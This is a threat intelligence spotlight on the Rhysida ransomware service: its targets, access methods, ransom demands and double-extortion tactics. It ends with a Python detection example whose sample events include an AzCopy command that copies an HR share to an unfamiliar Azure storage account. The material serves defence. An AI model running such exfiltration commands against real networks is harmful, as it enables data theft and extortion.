MOXFIVE Threat Actor Spotlight - Rhysida

Every month, we take a look at a current ransomware threat actor. If you would like to receive this via email each month, click below to subscribe to the MOXFIVE mailing list.


Rhysida

Rhysida, a ransomware-as-a-service (RaaS) operation that emerged in 2023, has rapidly gained traction among threat actors. Rhysida provides use of its ransomware and dark web infrastructure, including a data leak site and negotiation channels, to a variety of threat actors in exchange for a percentage of the ransom. This can produce more variance between attacks than is seen with ransomware operated by a single threat actor group. Rhysida has become one of the most actively used ransomware services, particularly during Q3 2024.

Threat actors deploying this ransomware primarily target the Healthcare sector but have been seen impacting a wide range of industries. In most cases, initial access has been gained through phishing emails, unpatched vulnerabilities such as Zerologon (CVE-2020-1472), and external-facing remote services. Additionally, infections have been linked to users downloading and installing malicious Teams executables, leading to widespread incidents across various organizations.

Key Highlights:

June 2024 Targeted Industries: Threat actors deploying Rhysida have primarily targeted the Healthcare industry throughout the year, and this trend remained consistent throughout July. However, other industries have been commonly impacted and remain at risk of this threat.

Ransomware Payment Demands: MOXFIVE has observed Rhysida payment demands reaching as high as $2 million. In some cases, ransom negotiations have been successful, with reductions of up to 50% from the initial demand. These outcomes were often achieved by emphasizing the size of the impacted business and the perceived value of the exfiltrated data.

Notable Leveraged Exploits:

Data Exfiltration: Threat actors deploying Rhysida use a double extortion strategy, where they exfiltrate sensitive data and leverage a public leak site with a countdown timer to pressure victims into paying. In some cases, threat actors utilized AZCopy, a command-line tool created by Microsoft, to exfiltrate large volumes of data from compromised networks to Azure Blob Storage.
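The AZCopy-to-Blob-Storage pattern described above lends itself to a simple process-creation detection. The following is an added example written for this spotlight, not MOXFIVE tooling; the event field names (`host`, `user`, `image`, `cmdline`), the sample events and the `KNOWN_ACCOUNTS` allowlist are all constructed assumptions, and the storage account names are fictitious.

```python
import re

# Constructed sample of process-creation events (e.g. a JSON export of
# Sysmon Event ID 1 / EDR telemetry). Field names are an assumption.
SAMPLE_EVENTS = [
    {"host": "FS01", "user": "CORP\\backup-svc", "image": r"C:\Tools\azcopy.exe",
     "cmdline": r'azcopy.exe copy "D:\Shares\Finance" "https://corpbackups.blob.core.windows.net/nightly?sv=2022-11-02&sig=REDACTED" --recursive'},
    {"host": "WS-042", "user": "CORP\\jdoe", "image": r"C:\Users\jdoe\AppData\Local\Temp\azcopy.exe",
     "cmdline": r'azcopy.exe copy "\\FS01\HR" "https://x9kq2stor.blob.core.windows.net/u?sv=2022-11-02&sig=REDACTED" --recursive'},
    {"host": "WS-042", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# Storage accounts the organisation legitimately uses (assumed allowlist).
KNOWN_ACCOUNTS = {"corpbackups"}

# Capture the storage account name from a Blob Storage URL in the command line.
BLOB_URL = re.compile(r"https://([a-z0-9-]+)\.blob\.core\.windows\.net[^\s\"']*", re.IGNORECASE)


def detect_azcopy_exfil(events, known_accounts=KNOWN_ACCOUNTS):
    """Return one alert per AzCopy 'copy' to an Azure Blob Storage account.

    Uploads to accounts outside the allowlist are rated high; an AzCopy binary
    running from a user's Temp directory and a SAS token in the URL are noted
    as extra triage context, since both are typical of ad-hoc exfiltration.
    """
    alerts = []
    for ev in events:
        image = ev.get("image", "").lower()
        cmd = ev.get("cmdline", "")
        if not image.endswith("azcopy.exe") and "azcopy" not in cmd.lower():
            continue
        # Only the copy subcommand moves data; login/list are lower interest here.
        if " copy " not in f" {cmd.lower()} ":
            continue
        for m in BLOB_URL.finditer(cmd):
            account = m.group(1).lower()
            alerts.append({
                "host": ev.get("host"),
                "user": ev.get("user"),
                "account": account,
                "known_account": account in known_accounts,
                "sas_token": "sig=" in m.group(0).lower(),
                "user_temp_path": "\\appdata\\local\\temp\\" in image,
                "severity": "info" if account in known_accounts else "high",
            })
    return alerts
```

Pair the process-level rule with egress monitoring for `*.blob.core.windows.net`, since a renamed binary defeats the image-name check but not the destination check.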